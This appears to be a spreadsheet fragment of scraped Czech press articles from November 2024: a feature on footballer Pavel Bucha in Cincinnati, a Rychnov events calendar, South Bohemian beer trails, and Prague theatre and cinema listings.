SESTUP ANI BARÁŽ NEJSOU. JEDINÝ CÍL JE DOSTAT SE DO PLAY OFF.“ „KDYŽ VSTANOU, PRVNÍ, CO SI UDĚLAJÍ, JE KAFE. A DO TRÉNINKU HO PIJÍ JEN Z LITROVÉHO KELÍMKU, ČÍMŽ TĚLO MOC NEHYDRATUJÍ.“ JINÝ SVĚT. Pavel Bucha nachází v Cincinnati dosud nepoznané. OPORA. Český záložník si za krátkou dobu vydobyl pozici jedné z klíčových postav mužstva. RODINA. Bez manželky Denisy a syna Matiase by za oceánem nebyl. SHOW. Ohňostroje před zápasy americké elitní fotbalové soutěže nesmí scházet. Ani na stadionu v Cincinnati . INTER MIAMI . Lídra základní části MLS nabitého superhvězdami potkal už 2x, jednou vyhrál, jednou odešel poražen. Na Lionela Messiho však zatím na trávníku nenarazil. POZNÁVAČKY. Jakmile mají Buchovi volno, vyrážejí objevovat nová místa. LIGA MISTRŮ. Když český záložník v kabině řekne, že si v dresu Viktorie Plzeň 5x zahrál Champions League a nastoupil i proti Bayernu Mnichov , spoluhráči mají otevřená ústa. SLAVIA. V její akademii fotbalově vyrostl, za áčko odehrál 5 utkání. FANOUŠCI. Lidé v hledišti už nejedí jen popcorn, ale umí ocenit i pěknou akci. TERČ. Středopolař z Nelahozevsi bývá obvykle bráněn natěsno. SPOKOJENOST. Po vyřízení veškerých formalit českému vyslanci v Cincinnati už nic nechybí k pohodovému životu. 3 TOLIK ZÁPASŮ STIHL V AMERICKÉ OBDOBĚ LIGY MISTRŮ. CINCINNATI VYPADLO VE 2. KOLE S MEXICKÝM MONTERREY. TOP STŘELCI SEZONY MLS Christian BENTEKE DC United 23 Lionel MESSI Inter Miami 20 Denis BOUANGA LA FC 20 Luis SUÁREZ Inter Miami 20 Cucho HERNANDEZ Columbus Crew 19 8 TOLIK BODŮ VYKOPAL PAVEL BUCHA V ZÁKLADNÍ ČÁSTI MLS ZA 4 GÓLY A 4 ASISTENCE. MLS PO ZÁKLADNÍ ČÁSTI 1. Inter Miami 22 8 4 79:49 74 2. Columbus Crew 19 9 6 72:40 66 3. Los Angeles FC 19 7 8 63:43 64 4. Los Angeles Galaxy 19 7 8 69:50 64 5. Real Salt Lake 16 11 7 65:48 59 6. FC Cincinnati 18 5 11 58:48 59 FOTBALOVÝ ZÁLOŽNÍK PAVEL BUCHA Věk: 26 (*11. března 1998 v Mělníku ) Rodinný stav: ženatý, manželka Denisa, syn Matias Kariéra: Čechie Kralupy nad Vltavou (2004-06), Neratovice (2006-07), Slavia Praha (2007-18), Viktoria Plzeň (2018- 24), Mladá Boleslav (2019), Cincinnati (2024-?) Bilance v české lize: 141 zápasů/28 gólů Bilance v LM: 5/0 Bilance v MLS: 32/4 Největší úspěch: mistr ČR (2022) FOTO: PROFIMEDIA.CZ FOTO: INSTAGRAM PAVLA BUCHY FOTO: PROFIMEDIA.CZ, INSTAGRAM PAVLA BUCHY Autor: TEXT: PAVEL HARTMAN pavel.hartman@cncenter.cz Autor Pavel Hartman Rubrika transition_slide R O ZH O VO R</t>
  </si>
  <si>
    <t>20241101_665_3239763865_3d9aeca000ab0d894126.html</t>
  </si>
  <si>
    <t>3d9aeca000ab0d894126</t>
  </si>
  <si>
    <t>Přehled kulturních událostí na měsíc listopad</t>
  </si>
  <si>
    <t>Přehled kulturních událostí na měsíc listopad Kulturní události Kultura s.r.o. Pelclovo divadlo • SVATOMARTINSKÉ SLAVNOSTI Ne 10. 11. 2024, 14.00 – 19.00 Průvod svatého Martina , doprovodný program, řemeslné stánky. Více str. 15. Místo konání: Staré náměstí • VEDLEJŠÍ ÚČINKY / Stefan Vögel Čt 7. 11. 2024, 19.00 Brilantní konverzační přestřelka o partnerských vztazích – a nejen o nich! Produkce: Divadlo Palace Praha Vstupné: 490, 470 Kč. Předprodej probíhá. Více na str. 14. • CAVEMAN Út 12. 11. 2024, 19.00 One man show o tom, co dělá muže mužem a ženu ženou, o rozdílech mezi nimi. Vstupné: 450, 420, 390 Kč Předprodej probíhá. Více nas str. 14 • JIŘÍ ŠLITR 100 Ne 24. 11. 2024, 16:00 Vzpomínkový koncert k výročí 100 let od narození Jiřího Šlitra Vstupné: 230 Kč Předprodej probíhá. Více str. 14. PŘIPRAVUJEME • NADECHNOUT SE ŽIVOTA / David Hare 2. 12. 2024, 19.00 Manželka a milenka. Nastal čas osvobodit se od muže, který je opustil. Hrají: Jitka SMUTNÁ, Tereza BRODSKÁ Režie: Šimon Dominik Produkce: Divadlo Ungelt Praha Vstupné: 490 Kč, 470 Kč Předprodej probíhá • VÁNOČNÍ JARMARK So 7. 12. 2024, 9.00 – 17.00 Tradiční prodejní výstava šikovných řemeslníků, prodejců kvalitních pochutin 15.00 – ŠUBÍSKOVO VÁNOČNÍ PUTOVÁNÍ. Vánoční pohádka Divadýlka MRAK. Vstupné: 50 Kč SPOLEČ. CENTRUM • TANEČNÍ ODPOLEDNE Ne 10. 11. 2024, 14.00 K tanci hraje taneční skupina STUDIO MIX Vstupné: 100 Kč • TANČÍRNA So 22. 11. 2024, 20.00 DJ Mirek Novotný. Vstupné: 120 Kč • VELKÝ KARNEVAL 23. 11. 2024, 16.00 Téma: CIRKUS Soutěže, bohatá tombola, dětská diskotéka • TANEČNÍ ODPOLEDNE Ne 24. 11. 2024, 14.00 K tanci hraje taneční skupina COMBI Vstupné: 100 Kč PŘIPRAVUJEME • RADŮZA St 29. 1. 2025, 19.00 Koncert Vstupenky: 450 Kč/předprodej, 490 Kč/na místě Předprodej probíhá. KINO Blues, rock, soul podvečer s …. • MIKE ROSS BAND /UK/CZ St 6. 11. 2024, 19.00 Mike Ross /kytara, zpěv, Tereza Čepková / baskytara, Klára Böhm / bicí, doprovodný zpěv. Velmi emotivní hlas a opojná virtuózní kytarová hra. Vstupné: 320 Kč. Předprodej probíhá. Více na str. 14. PŘIPRAVUJEME Blues, rock, soul podvečer s …. • CROSSROAD /CZ St 18. 12. 2024, 19.00 Kapela hrající blues-rock Vstupné: 320 Kč. Předprodej probíhá. MĚSTSKÁ KNIHOVNA • RYCHNOVEM, JAK HO UŽ NEZNÁTE 16. 10. – 18. 11. 2024 Výstava - Ing. Vladimír Homolka • JAK NA CHYTRÝ TELEFON A TABLET Út 5. 11., 12. 11. 2024 Seminář pro zájemce 65+, kteří si přinesou vlastní telefon či tablet. Začátečníci: 8.00 – 12.00 Mírně pokročilí: 13.00 – 17.00 Vstupné: ZDARMA. NUTNÁ REZERVACE • CESTOVÁNÍ SE PSEM St 6. 11. 2024, 18.00 Nejlepší cestovatelská přednáška roku – Slávek Král Vstupné: 100 Kč • TRÉNOVÁNÍ PAMĚTI Čt 7., 14., 21. 11. 2024, 10.00 – 11.00 Mgr. Alena Naimanová Vstupné: 50 Kč/lekce. Rezervace nutná. • BETLÉMY St 20. 11. 2024, 18.00 Vernisáž výstavy obrazů – Josef Kejval, hudební doprovod žáků ZUŠ Výstava potrvá do 6. 1. 2025 • PLNÁ NÁRUČ POHÁDEK Z ORLICKÝCH HOR Út 26. 11. 2024, 17:00 Josef Lukášek , Jarmila Haldová Vstup ZDARMA MAS SPLAV • OLYMPIÁDA REGIONÁLNÍCH ZNALOSTÍ ŽÁKŮ 2. STUPNĚ ZŠ – 6. ročník St 20. 11. 2024, 9.00 – 13.00 FINÁLE - vědomostní soutěže základních škol na Rychnovsku, Dobrušsku a Kostelecku Místo konání: Společenské centrum RK HOTEL STUDÁNKA • MEIVIS – ŽIVÁ HUDBA So 9. 11., 23.11., 21.00 – 24.00 Rezervace stolu nutná Vstupné: 100 Kč Místo konání: Vinárna hotelu Studánka • ÚKLID LESA VČELNÉHO Ne 10. 11. 2024, 14.30 – 16.30 Místo konání: Lesopark Včelný - sraz na kolonádě u pramene Studánky • SVATOMARTINSKÉ MENU V HOTELOVÉ RESTAURACI 8. – 11. 11. 2024 • THE ENGLISHMEN So 30. 11. 2024, 20.30 – 24.00 Opět zahrají světové hity, rezervace stolu nutná. Vstupné: 100 Kč Místo konání: Vinárna hotelu Studánka • PODZIMNÍ TANEČNÍ KURZY NA STUDÁNCE Do 8. 12 .2024, 18.00 Pro začátečníky Místo konání: Sál Rudolfa Rokla PŘIPRAVUJEME • MUZIKÁLY NARUBY 8. 8. 2025, 19.00 Místo konání: letní amfiteátr HOTEL HAVEL • KULTURA S HAVLEM Při zakoupení vstupenky na rychnovskou kulturní akci, můžete v den akce od 16.00 do 19.00 využít 15% slevu v restauraci, kavárně či pivnici. • HOTELOVÁ PIVNICE Pátky a Soboty, 15.00 Na čepu pivní speciály a tradiční speciality k pivu . MC JÁJA • VÁNOČNÍ VYRÁBĚNÍ 26. 11. 2024, 10.00 Vyrábění s dětmi • HERNA PRO RODIČE S DĚTMI Po – Čt 9.00 – 11.30 RŮZNÉ • TÝDEN VZDĚLÁVÁNÍ DOSPĚLÝCH 4.- 8. 11. 2024 www.tydenvzdelavanidospelychkhk.cz • ADVENTNÍ JARMARK 22. 11. 2024, 9.30 – 15.30 Místo konání: Stacionář sv. Františka • PODZIMNÍ CESTOU BROUČKŮ S LAMPIÓNKY 2. 11. 2024, 17.00 Místo konání: odchod ze Starého náměstí • HOSPODSKÝ KVÍZ Čtvrtky, 19.00 Nutné přihlášení na FB – skupina hospodský kvíz. Místo konání: Restaurace Taverna • BRUNO GRÖNING Čtvrtky 14., 21., 28. 11 . 2024. 16.00 Dokumentární film Vstup: dobrovolný. Místo konání: sál Pelclova divadla (1.patro) RŮZNÉ • PŘEDVÁNOČNÍ JARMARK 23. 11. 2024, 9.00 – 16.00 Tradiční jarmark v Muzeu krajky Vamberk plný výrobků lidových řemeslníků z Orlických hor a Podorlicka . Místo konání: Muzeum krajky Vamberk • KRAJKÁŘKA JANA ŠTEFKOVÁ Do 31. 3. 2025 Výstava krajek Místo konání: Muzeum krajky Vamberk • HISTORICKÉ FOTOGRAFICKÉ TECHNIKY Hana Michaličková, Luboš Víteček Do 30. 11. 2024 Unikátní výstava autorů, kteří kromě běžných technik rádi využívají také historické fotografické techniky jako je modrotisk, sépiový tisk, slaný papír, kalitypie, gumotisk, olejotisk či strukturáž. Místo konání: Sýpka – Muzeum Orlických hor, Rokytnice v O. h. • VÍTÁNÍ ADVENTU V SÝPCE 30. 11. 2024, 10.00 – 17.00 Sobota předcházející první adventní neděli je v Sýpce opět ve znamení výroby adventních věnců. Místo konání: Sýpka – Muzeum Orlických hor, Rokytnice v O. h. • BETLÉMY NEJEN Z LITURGICKÉHO HLEDISKA 2. 11. 2024, 14.00 Vánočně laděná přednáška Vladimíra Homolky, který se tentokrát zaměří na téma betlémů, jež jsou úzce spjaty s kapucíny a následovníky Františka z Assisi . Místo konání: Zahrada kláštera kapucínů, Kupkovo náměstí 132, Opočno • ADVENTNÍ ROZJÍMÁNÍ 2. 11. 2024, 10.00 – 14.00 Adventní rozjímání v kapucínském klášteře. Součástí akce bude tvořivá dílna pro rodiče a děti, během níž si vyrobíme vlastní betlém inspirovaný postavou sv. Františka z Assisi , zakladatele tradice živých jesliček. Místo konání: Zahrada kláštera kapucínů, Kupkovo náměstí 132, Opočno • UKONČENÍ BOTANICKÝCH PROCHÁZEK 7. 11. 2024, 17.00 Ukončení botanických vycházek spojená s promítáním fotografií. Místo konání: Přednáškový sál Městské knihovny v Týništi nad Orlicí Sportovní události • HRÁTKY PRO PŘEDŠKOLÁKY Soboty do 14. 12. 2024, 9.00 – 12.00 Pro rodiče a děti ve věku 1-6 let. Vstupné: 50 Kč / osoba Místo konání: ZŠ Javornická, tělocvična • PLAVÁNÍ I (1. - 6. třída) Každé úterý, 14.00 – 15.00 • PLAVÁNÍ III (6. - 9. třída) Každé úterý, 17.00 – 18.00 Přihlášení ONLINE na www.deckoviny.cz • PŘIJĎTE SI HRÁT S MÍČEM Pátky, 14.00 – 15.00 Soutěže a hry s míčem pro dívky 1. třídy a předškolačky Místo Konání: ZŠ Javornická Kontakt RÉMA RK: 736 674 440. Vaše pozvánky do kulturního a sportnovního přehledu posílejte na e-mailovou adresu Rychnovského zpravodaje zpravodaj@rychnov-city.cz Prezentace akcí na této straně je zdarma.</t>
  </si>
  <si>
    <t>6000</t>
  </si>
  <si>
    <t>20241101_666_3239762784_9bc21e8b40e650c2e3e0.html</t>
  </si>
  <si>
    <t>9bc21e8b40e650c2e3e0</t>
  </si>
  <si>
    <t>Na jihu Čech je hned sedm pivních tras</t>
  </si>
  <si>
    <t>Na jihu Čech je hned sedm pivních tras Českobudějovicko, Toulava, Šumava i Novohradsko s Doudlebskem mají své turistické stezky spojené s návštěvami malých i velkých pivovarů. Pivo k jižním Čechám neodmyslitelně patří. Díky velkému množství pivovarů a minipivovarů v regionu z nich lze snadno sestavit i jednotlivé stezky. Návštěvníci jich v kraji mohou projít nebo projet hned sedm. Takové putování za pivem může být ideálním tipem na podzimní výlet. Pivní kultura je od května minulého roku zapsána do Seznamu nemateriálních statků tradiční lidové kultury. Tradice setkání a posezení u piva je na jihu Čech silná. Za tímto oblíbeným nápojem přijíždí lidé nejen z celé České republiky , ale také ze zahraničí. Aby mohli jednotlivá místa co nejlépe a pohodlně procestovat, jsou sestavená do Pivních stezek. Ta první vede po Budějovicku , nechybí v ní známé klasiky jako Budvar nebo Samson, hospodští turisté však zavítají i do menších či rodinných pivovarů. Trasa s číslem dvě zavede pivní poutníky do Toulavy, konkrétně do táborských minipivovarů Garage a Pod Besedou, kde pivovarníci vaří ze tří druhů sladu. Druhý zmíněný se nachází ve sklepních prostorách restaurace Beseda společně s muzeem pivovarnictví. Vše spadá pod Střední školu obchodu, služeb a řemesel, jejíž studenti prostory využívají v praktické výuce. Trojka vede po Písecku, Blatensku , Strakonicku a Vodňansku. Vynechat nelze strakonický pivovar, Hulváta z Truskovic nebo Zámecký pivovar v Blatné . Čtvrtá trasa se táhne šumavskou krajinou. „Ochutnáte třeba vychlazený kousek v prachatickém pivovaru nebo v hotelu Bobík ve Volarech . Byla by škoda opomenout ekofarmu s pivovarem v Horních Chrášťanech,“ nalákala Jana Píchová z Jihočeské centrály cestovního ruchu (JCCR). Kdo zvolí pátou trasu, pochutná si v pivovaru Krumlov nebo Rožmberk. Jílovice, Žumberk , Doudlebeer nebo Svachovka, to jsou lákadla šesté trasy na Novohradsku - Doudlebsku . Komu se líbí šťastná sedmička, v Třeboni ochutná tamní Regent, Stráž si dá ve stejnojmenném městě nebo ho osloví pivo z Nové Bystřice . „Nabídka pivovarů a minipivovarů v jižních Čechách je opravdu široká. Kdo chce vyrazit za pivní turistikou, tak téměř neví, kam vyrazit dřív. Doporučujeme se vydat na všechny trasy, a to ideálně smapou, kde jsou informace o všech podnicích a další zajímavosti,“ poradil ředitel JCCR Petr Soukup . Právě mapa pivovarů a minipivovarů je velmi oblíbeným doplňkem na cestu. Všechny potřebné informace včetně mapy ke stažení jsou k dispozici na webu jiznicechy.cz. Cestování za pivem se může proměnit i v zábavu, a to v podobě možnosti zisku diplomu pivního znalce. Stačí na každé trase navštívit alespoň tři místa, tím získat pomyslné tři čárky na pivním lístku, a diplom náleží opravdovému pivnímu znalci. Pivo a pivní stezky v jižních Čechách nejsou jen zážitkem pro jednotlivce, ale skvěle poslouží i firemní a skupinové klientele. Region nabízí pestrou paletu zážitků – od návštěv velkých pivovarů po objevování kouzla minipivovarů, které se stále více zaměřují na zážitkové programy. „Firmy mohou svým zaměstnancům nebo obchodním partnerům dopřát unikátní zážitky, jako je výuka vaření piva pod vedením zkušených sládků. Tyto aktivity nejenže posilují týmového ducha, ale také poskytují příležitost k netradičnímu propojení s místní kulturou a tradicí,“ přidala Píchová. SPRÁVNÝ ŘÍZ PIVOVAR JE TAKÉ V HORNÍCH CHRÁŠŤANECH NA PRACHATICKU. NACHÁZÍ SE V AREÁLU TAMNÍ EKOFARMY A NECHYBÍ TAM ANI RESTAURACE. VAŘÍ ŘEMESLNÁ PIVA . „OCHUTNÁTE VYCHLAZENÝ KOUSEK V PRACHATICKÉM PIVOVARU NEBO V HOTELU BOBÍK VE VOLARECH .“ Autor: TEXT: EVA PETROVÁ FOTO: MAFRA Autor Eva Petrová</t>
  </si>
  <si>
    <t>20241101_667_3239764645_929d6a80072c586c0c41.html</t>
  </si>
  <si>
    <t>929d6a80072c586c0c41</t>
  </si>
  <si>
    <t>Kultura Divadlo Na Prádle Besední 3, Praha 1 www.muzikal-frankenstein.cz Listopad 30. Frankenstein muzikál / Studio Dendrion Prosinec 1. Frankenstein muzikál / Studio Dendrion 6. Frankenstein muzikál / Studio Dendrion 7. Frankenstein muzikál / Studio Dendrion Leden 9. Frankenstein muzikál / Studio Dendrion 10. Frankenstein muzikál /Studio Dendrion Začátky programu v 19.00, není-li uvedeno jinak. Národní třída 28, Praha 1 221 105 225. Pokladna otevírá vždy 1 hodinu před začátkem prvního představení. www.evald.cz 1. BIO SENIOR Zahradníkův rok 14.00 1. Když se světlo zlomí 16.00 1. Amerikánka 17.45 1. Anora premiéra 20.00 2. BIO JUNIOR Bambi : Příběh života z lesů 14.00 2. Janžurka 15.45 2. Poklad 18.00 2. Konkláve premiéra 20.00 3. BIO JUNIOR Pyšná princezna předpremiéra 14.00 3. Výjimečný stav 15.45 3. Až na věky 17.45 3. Vlny 19.45 4. BIO SENIOR Zapisník alkoholičky 14.00 4. Mord 16.00 4. Teorie všeho premiéra 17.45 4. Substance 20.00 5. BIO SENIOR Až na věky 14.00 5. tata_bojs.doc 16.00 5. Tatami 18.00 5. Konkláve 20.00 6. BIO SENIOR MIKI 14.00 6. Zapisník alkoholičky 16.10 6. The Apprentice: Příběh Trumpa 18.00 6. Anora 20.20 7. BIO SENIOR Janžurka 14.00 7. Světýlka 16.15 7. Dům „Slovo“. Nedopsaný román premiéra 18.00 7. Poklad 20.30 8. BIO SENIOR Vlny 14.00 8. Javari 16.30 8. Když se světlo zlomí 17.45 8. V kuchyni premiéra 19.30 9. BIO JUNIOR Život k sežrání 14.00 9. Vlny 15.45 9. Picasso – rebel v Paříži premiéra 18.15 9. Konkláve 20.15 10. BIO JUNIOR Pyšná princezna premiéra 14.00 10. Lee: Fotografka v první linii 15.45 10. Rok vdovy 18.00 10. Anora 20.15 Další program na: www.evald.cz Celetná 17, Praha 1 , www.divadlovceletne.cz, 222 326 843, 608 327 107, rezervace@divadlovceletne.cz KAŠPAR 2. Jonáš a tingl-tangl 15.00 5. Rok na vsi 6. Dámská čtyřhra 7. Protokol 8. FC Rudý lev 9. FC Rudý lev 17.00 10. Terasa 17.00 11. Snímek 51 12. Dámská čtyřhra 13. Terasa 17. Tancovačka 20.00 18. Život je sen 19. Protokol 20. Rok na vsi 21. Rok na vsi 22. Dámská čtyřhra 23. Jonáš a tingl-tangl 15.00 23. Cyrano 27. Vincenc 28. Život je sen 29. Cyrano 30. Cyrano Kašpar / KLUBOVNA 1. Osiřelý západ 2. Já, Feuerbach 3. Audience + Vernisáž 4. Audience + Vernisáž 6. Draci noci premiéra 7. Kodaň 8. Kráska z Leenane 9. Draci noci 10. Vincenc 12. Simpatico 13. Vincenc 14. Politika správcovny 15. Politika správcovny 16. Lebka z Connemary 18. Slovácko sa nesúdí 19. Kodaň 20. 2084 21. 2084 22. Kráska z Leenane 23. Slovácko sa nesúdí 24. Lebka z Connemary 25. Plíce premiéra 26. Simpatico 27. Já, Feuerbach 28. Kráska z Leenane Kašpar / KOCHÁNKY 1. Eastwood 2. Eastwood 8. Politika správcovny 9. Politika správcovny 10. O Malence Divadlo b 11.00 29. Popelka nazaretská 30. Popelka nazaretská DIVADLO VERZE 1. Rozptýlení / Barcarole 2. Lež… aneb komedie o pravdě derniéra 3. Úča musí pryč 16.00 Drazí rodiče 24. Vina Vína Studio mladých umělců 16.00 Šťastný vyvolený 25. Vášnivost, Thriller DIVADLO NAHRANĚ 4. Inkognito 26. Paralelní vesmíry SPOLEČNOST DR. KRÁSY 14. Bratr našeho Boha CONAMARA CHAOS A INSPIRAL DANCE COMPANY 15. Anord na Bíse Večer irské hudby a tance DIVADLO MA 16. Zimní kouzlo 15.00 Běh života KAMPAK 30. Celou noc venku 15.00 Začátky představení v 19.30, není-li uvedeno jinak. DIVADLO ORFEUS Plzeňská 76, Praha 5 604 909 517, divadlo@orfeus.cz www.orfeus.cz 5. Kravinec uprostřed cesty 7. Neskutečné zážitky Sheldona a paní Levinové 10. Haló Jácíčku Divadlo Františka Troníčka 14.00, 16.00 12. Podzemí umění 14. Podzemí umění 15. Sametový Kryl : Missa koncert 17. Fousatý případ Valeriána Draka Divadlo Františka Troníčka 16.00 19. Hostina pro Jestřába 21. Lháři 26. Volejovky 28. Neskutečné zážitky Sheldona a paní Levinové Začátky představení v 19.00, není-li uvedeno jinak. Divadlo i divadelní kavárna je pro diváky otevřena od 18.00. Divadlo Kolowrat Kolowratský palác, Ovocný trh 6, Praha 1 www.divadlo-kolowrat.cz, Rezervace:artway.theatre@gmail.com, 775 488 998 2. P. Kryl: Neposedný doubek pro rodiny s dětmi 10.30 4. F. Kafka / J. Grossman : Proces 6. K. Čapek: Jak se dělá divadlo 7. Molière/D. Ullrichová: Don Juan 12. V. Havel : Vernisáž 14. J. Topol : Hodina lásky 16. M. Štráfeldová/ T. Karpianus: Toyen – Všechny barvy samoty 18. N. V. Gogol: Ženitba 20. W. Shakespeare: Macbeth 21. K. Čapek: Věc Makropulos 22. Festival Nad Prahou půlměsíc 18.00 24. Š. Vaculíková: Milena má problém 26. R. Schimmelpffennig: Žena u dřívějška 27. F. Kafka / J. Grossman : Proces Začátky představení v 19.30, není-li uvedeno jinak. Klimentská 16, Praha 1 , studio a cafégalerie: 602 463 664, produkce@studiocitadela.cz, FB | IG | X @studiocitadela, www.studiocitadela.cz STUDIO CITADELA 2. Kathak, indický tanec Ivana a Anežka Hessovy 18.00 Vystoupení v rámci indického kulturního večera DIWALI KD Ládví, P 8 14., 21. Lets PASS 16.30 Otevřené on-line workshopy. Info www.letspass.eu 21. LOKI 20.00 První společný projekt Mikrochoru a Storytelling CZ, autorský večer – živé vyprávění Justina Svobody s hudbou Lukáše Prchala. 28. ANTIGUMA 20.00 Představení Brastr’s kolektiv divadla. STUDIO CITADELA DĚTEM 2. O holčičce, která zlobila 10.30 Pohádka divadélka Kasperle. KC Kaštan, Bělohorská 201, P 6 O králi Karlíčkovi, Žlutý kopec 10.30 Pro malého diváka o českém králi Karlu IV . 3. Vodárenská věž, Na Výšinách 1000/1, P 7 17. Kulturně Komunitní Centrum Koruna, Radotín PRAVIDELNÉ KURZY A DÍLNY Improvizace – herecký kurz T. Pospíšila – ÚT od 18.00 (www.skolaretoriky.cz) Taneční ateliér, klasický indický tanec kathak – ST od 18.15, (info 606 952 175, www.kathak.wz.cz) Bohnická divadelní společnost zve na otevřené zkoušky nové inscenace– PÁ 17.30 (info 602 463 664) Za podporu děkujeme: Hl. město Praha , Ministerstvo kultury ČR, Státní fond kultury ČR, Městská část Praha 1 , program Kreativní Evropa Obecní dům Náměstí Republiky 5, Praha 1 224 232 429, pokladna@fok.cz www.fok.cz Obecní dům | Smetanova síň 6., 7. Rhapsody in Blue &amp;amp; Requiem 19.30 George Gershwin Rhapsody in Blue Andrew Lloyd Webber Requiem Karel Košárek | klavír Lada Bočková | soprán Pavel Černoch | tenor Český filharmonický sbor Brno Joel Hána | sbormistr Pražští symfonikové Alena Hron | dirigentka 27., 28. Obrázky z výstavy 19.30 Karel Husa Houslový koncert (česká premiéra) Modest Petrovič Musorgskij Obrázky z výstavy (arr. Maurice Ravel ) Milan Paľa | housle Pražští symfonikové Tomáš Brauner | dirigent Kostel sv. Šimona a Judy 16. Hudbou k srdci – Melodie v hlavě 10.00 Mezigenerační hudební setkávání Workshop pro seniory a jejich vnoučata Karolína Řepová | lektorka 19. Händel – Concerti grossi 19.30 Florian Deuter | barokní housle Mónica Waisman | barokní housle Giovanni de Angeli | barokní hoboj Capella da Camera Praga Esther- Rebecca Neumann | koncertní mistr Lukáš Verner | umělecký vedoucí Praha 7 – Letná , Jana Zajíce 7 Tel.: 603 552 558, scarabeus.galerie@gmail.com www.galeriescarabeus.cz út 14.00–19.00, so-ne 13.00 – 18.00 středa až pátek na objednání pro školy a skupiny. Muzeum kávy Alchymista KÁVA A KÁVOVINY v proměnách času a kultur GALERIE SCARABEUS LOUTKY A RODINNÁ LOUTKOVÁ DIVADLA ZAHRADA GALERIE SCARABEUS Naučná stezka příroda a umění na počest ornitologa a hrdiny Veleslava Wahla a sochami Igora Hlavinky Divadlo v Řeznické, z. ú., Řeznická 17, Praha 1 720 993 787, divadlo@reznicka.cz, www.reznicka.cz 1. Odvolání 2.Eleanor 5. Jeden německý život 6. Relativita 7. Věčná milenka Alma Mahlerová 8. S prezidentem v divočině 10. Falešná nota 11. Poslední sezení u doktora Freuda 13. Hloupé Maličkosti host 14. A tak tě prosím, kníže 16. Improvizační Řez - Český film 18. A tak tě prosím, kníže 20. Show Dr. Ruth poslední repríza před derniérou 21. Věčná milenka Alma Mahlerová 22. HAF 11.00 22. Blázinec 23. Eleanor 15.00 25. Falešná nota 27. S prezidentem v divočině 28. Bez zábran host 29. Eleanor 30. Odvolání Začátky představení v 19.30, není-li uvedeno jinak. Reduta Národní 20, Praha 1 , www.divadlominaret.cz, 732 575 666, info@divadlominaret.cz Činnost souboru je podporována Prahou 1 3. Tři veselá prasátka 15.00 4. Tři veselá prasátka 9.00, 10.30 5. Démoni současnosti pro mládež 9.00, 10.30 6. Démoni současnosti pro mládež 9.00, 10.30 10. Myšáci jsou rošťáci! 15.00 11. Myšáci jsou rošťáci! 9.00, 10.30 12. Démoni současnosti pro mládež 9.00, 10.30 13. Démoni současnosti pro mládež 9.00, 10.30 24. O Rusalce 15.00 25. O Rusalce 9.00, 10.30 26. Démoni současnosti pro mládež 9.00, 10.30 27. Démoni současnosti pro mládež 9.00, 10.30 Herecké kurzy v Redutě. Herecké kurzy pro děti a mládež (ve věku 10 až 18 let) na Praze 1 . Základní herecká průprava pod vedením herce a režiséra Luďka Jiříka je zakončena závěrečným představením. Kurzy se konají každou středu od 16.00 do 18.00. Bližší informace na tel.: 732 575 666. Městská knihovna v Praze , Mariánské nám. 1, Praha 1 www.mlp.cz, 222 113 425 KINO Na projekce Filmového klubu MKP a Filmového klubu Bio Senior s platnou legitimací Filmového klubu sleva 20 Kč. Cena legitimace 100 Kč (platí do 31. 12. 2024), k prodeji v pokladně MKP. 11. – 16. 3KinoFest 1. Film a spiritualita: Invaze (100 Kč) 19.00 4. Bio Fajnšmekr: Milé laskavosti (100 Kč) 19.00 5. Bio Senior: Vlny (Vstupné 80 Kč) 16.00 5. Filmový klub: Hypnóza (100 Kč) 19.00 7. Bio Fajnšmekr: Anora (130 Kč) 19.00 19. Bio Senior: Až na věky (80 Kč) 16.00 19. Filmový klub: Jiný člověk (100 Kč) 19.00 26. Bio Senior: Veni Vidi Vici (80 Kč) 16.00 27. Film a spiritualita: Rok vdovy (100 Kč) 19.00 KULTURA 6. JABLKOŇ – Michal Němec slaví 75. let! (590 Kč) 19.30 17. Karel Kryl sametový (330 Kč) 18.00 24. Flamenco: El Jardín / Zahrada (450 Kč) 19.30 PŘEDNÁŠKY 2. Cestovatelské odpoledne: Perly dalekého severu (60 Kč) 16.00 4. Příběhy české kriminalistiky: Pyrotechnikem nejen u kriminálních případů (60 Kč) 19.00 6. Alternativní cesty ke zdraví: Jak ve zdraví přežít dobu umělohmotnou (60 Kč) 17.00 7. O surrealismu: Všichni ti vyloučení, nepřijatí, zběhlí – surrealisté? (60 Kč) 19.00 18. Cestovatelská diashow: Zimní cesty do Gruzie a Střední Asie (150 Kč) 19.00 20. Italské listy: Ve spolupráci se Společností bratří Čapků (60 Kč) 17.00 26. Cestovatelské úterky: Andalusie (60 Kč) 19.00 28. Filosofie Hercula Poirota: Poirotova logika a etika (60 Kč) 18.00 29. Pozoruhodná historie Karlova mostu v Praze (60 Kč) 17.00 Více událostí najdete na mlp.cz/akce Činoherní klub Ve Smečkách 26, Praha 1 , www.cinoherniklub.cz, 211 151 877 1. Podivné odpoledne Dr. Zvonka Burkeho 2. Blešák čeká #2 Činoherní kavárna 14.00 3. ČK uvádí: Strážci Tádž Mahalu 4. Ošklivec 6. Hráči 7. 2:22 – Duchařský příběh 8. Linda Vista 9. Tramvaj do stanice touha 19.00 11. Bůh masakru 12. Ošklivec 14. 2:22 – Duchařský příběh 15. Trialog Ve Smečkách Činoherní kavárna 16. Hráči 17. Oslavy 17. listopadu Letorosty samomluv Činoherní kavárna 15.00 Sametový díl Kanceláře Blaník 17.00 Bára Hrzánová &amp;amp; Condurango 20.30 18. Konsent 20. Zrada 21. Hráči 22. Milá Evičko, milý Luďku 23. K.Š.E.F.T. 24. ČK uvádí: Každý něco pro vlast 25. Babyboom 26. Kočka na rozpálené plechové střeše 27. Milá Evičko, milý Luďku 28. K.Š.E.F.T. 29. Bůh masakru 30. 2:22 – Duchařský příběh Začátky představení v 19.30, není-li uvedeno jinak. Anenské náměstí 5, Praha 1 www.nazabradli.cz, 222 868 868 pokladna@nazabradli.cz 1. Racek DE freundlich 2. Bůh v Las Vegas 7. Ej Áj veřejná generálka 11.00 7. Franz a kavka festival Přelet nad loutkářským hnízdem (EK) 17.30 7. Miloslav König : křest alba Hedvábí 8. Ej Áj 1. premiéra 9. Ej Áj 2. premiéra 11. Freudovo pozdní odpoledne 12. Požitkáři 13. Medvěd s motorovou pilou EN friendly 14. Ej Áj od 18.15 dramaturgický úvod s Petrem Erbesem 15. Macbeth – Too Much Blood EN friendly 16. Vzkříšení UA friendly + od 16.00 Maraton psaní dopisů ( Amnesty International ) 17. Bůh v Las Vegas 18. Uvnitř banánu 19. O Pavlovi 22. Franz a kavka Pražský divadelní festival německého jazyka (EK) 17.00 23. Veřejní nepřátelé EN friendly + od 21.00 diskuze s Amnesty 